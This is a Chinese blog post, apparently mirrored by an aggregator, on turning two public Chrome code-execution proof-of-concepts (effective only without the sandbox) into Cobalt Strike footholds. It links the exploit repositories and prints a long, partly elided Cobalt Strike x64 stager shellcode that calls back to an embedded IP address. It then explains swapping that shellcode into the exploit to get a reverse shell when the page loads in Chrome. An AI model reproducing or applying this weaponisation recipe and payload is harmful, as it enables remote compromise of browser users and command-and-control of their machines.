6
CobaltStrike上线Chrome 0day
source link: https://misakikata.github.io/2021/04/CobaltStrike%E4%B8%8A%E7%BA%BFChrome-0day/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
CobaltStrike上线Chrome 0day
Thursday, April 15th 2021, 4:44 pm
前两天连续出了chrome的两个代码执行,都是在–no-sandbox环境下。想直接利用还是有点不方便。先添加chrome的执行参数如下
先运行第一个poc,https://github.com/r4j0x00/exploits,此处是开启了一个本地环境。
再试一下另一个新的,chrome的修复版本90也存在影响。https://github.com/avboy1337/1195777-chrome0day
此版本的POC其中的shellcode格式很眼熟,尝试利用cobaltstrike生成C#的payload。
生成后提取其中的十六进制的shellcode字段。类似如下。
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc8, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x66, 0x81, 0x78, 0x18, 0x0b, 0x02, 0x75, 0x72, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67,
......
0xf9, 0x1f, 0x00, 0xc6, 0xf5, 0x3b, 0xd3, 0x99, 0x7b, 0x9a, 0xf4, 0xba, 0x71, 0x45, 0x52, 0x29, 0x67, 0xeb, 0x53, 0x59, 0xc5, 0x00, 0x41, 0xbe, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x48, 0x31, 0xc9, 0xba, 0x00, 0x00, 0x40, 0x00, 0x41, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x41, 0xb9, 0x40, 0x00, 0x00, 0x00, 0x41, 0xba, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x48, 0x93, 0x53, 0x53, 0x48, 0x89, 0xe7, 0x48, 0x89, 0xf1, 0x48, 0x89, 0xda, 0x41, 0xb8, 0x00, 0x20, 0x00, 0x00, 0x49, 0x89, 0xf9, 0x41, 0xba, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x20, 0x85, 0xc0, 0x74, 0xb6, 0x66, 0x8b, 0x07, 0x48, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xd7, 0x58, 0x58, 0x58, 0x48, 0x05, 0x00, 0x00, 0x00, 0x00, 0x50, 0xc3, 0xe8, 0x9f, 0xfd, 0xff, 0xff, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38, 0x2e, 0x31, 0x31, 0x31, 0x2e, 0x31, 0x33, 0x30, 0x00, 0x12, 0x34, 0x56, 0x78
替换原exploit的shellcode字段。类似如下。
谷歌执行,会一直在加载的未响应状态,查看cs的能看到一个chrome进程的反弹shell。
但由于正常使用默认设置是沙盒环境,此漏洞并不影响,所以这个还得需要配合沙盒逃逸才有效果。
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK